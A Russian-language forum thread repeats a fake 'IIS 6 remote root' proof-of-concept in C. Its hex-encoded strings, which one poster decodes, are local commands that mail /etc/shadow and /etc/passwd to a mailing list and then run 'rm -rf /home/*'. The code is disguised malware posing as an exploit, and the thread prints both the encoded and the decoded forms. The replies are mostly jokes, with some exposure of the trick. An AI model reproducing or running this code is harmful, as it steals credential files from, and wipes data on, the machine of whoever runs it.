Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
В f-d remote root для IIS 6 выложили :-)
 
Day Jay [d4yj4y@yahoo.com]

/* Proof of concept code
   Please dont send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

   IIS 6 Buffer Overflow Exploit

   BUG: inetinfo.exe improperly bound checks
   http requests sent longer than 6998 chars.
   Can get messy but enough testing, and we have
   found a way in.

   VENDOR STATUS: Notified
   FIX: In process

   Remote root.

   eg.
   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
    + Connecting to host...
    + Connected.
    + Inserting Shellcode...
    + Done...
    + Spawining shell..

    Microsoft Windows XP [Version 5.1.2600]
   © Copyright 1985-2001 Microsoft Corp.
   C:\>



*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";


main()
{

//Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode);

//int socket = 0;
//double long port = 0.0;

//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE

//     for(int j; j < 30; j++)
        {
        //Find socket remote address fault
        printf(".");
        }
//overtake inetinfo here IIS_666666^
return 0;
}
 
дайте скомпилированную версию
гыгыгы :)
 
И МНЕ ТОЖЕ  
Код
//system(launcher); system(netcat_shell); system(shellcode); 

//int socket = 0; 
//double long port = 0.0; 

//#DEFINE port host address 
//#DEFINE number of inters 
//#DEFINE gull eeuEE 
//for(int j; j < 30; j++) 

ТОЛЬКО ЧЕГО ЭТО ЗАКОМЕНТИРОВАНО ИДЕТ?
и ЧЕГОТО КАЖЕТСЯ ТУТ НЕХВАТАЕТ? ИЛИ МЕНЯ ГЛЮЧИТ?
 
это засчита от скрипкиддоф. что бы не сразу работало :-))
 
да, кстати из проверенных источников стало известно, что раблотает только на юниксах из под рута
 
На mexicans юниксах, ибо они расположенны в доверенных диапазонах, который в тайне от всех прописан в ИИС, чтобы МС могла в любой момент похачить свои сервера :о))
 
Not that anyone would fall for running this on anything besides a test
system, but to save 30 second to decode, what it really does (locally,
not remotely) is:

cat /etc/shadow |mail full-disclosure at lists.grok.org.uk
cat /etc/passwd |mail full-disclosure at lists.grok.org.uk
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
 
2 птЫца
нет, нет, не верю, не верю, что они запихнули туда такое.. это наверно какаято ошибка, чьято злая шутка....
 
Цитата
птЫца пишет:

cat /etc/shadow |mail full-disclosure at lists.grok.org.uk
cat /etc/passwd |mail full-disclosure at lists.grok.org.uk
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

О, смотрю киды уже с шеллом бедного IIS-а развлекаются. Хыр, окстись , это же винда, у нее и команд то таких нет :))))))
 
Цитата
r00t пишет:
Цитата
птЫца пишет:

cat /etc/shadow |mail full-disclosure at lists.grok.org.uk
cat /etc/passwd |mail full-disclosure at lists.grok.org.uk
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

О, смотрю киды уже с шеллом бедного IIS-а развлекаются. Хыр, окстись , это же винда, у нее и команд то таких нет :))))))

:) нет ) киды мечтают поовнить ииску со своих хакирских линуксофф
 
Ну вот. Пришел поручик и все опошлил
 
гыгыгы
Кто там приставочку то забирает?
Xbox всетаки
 
а в какой файл лучше компилить в gif или mp3? и каким компилятором: msword или phpmyadmin?
Страницы: 1
Читают тему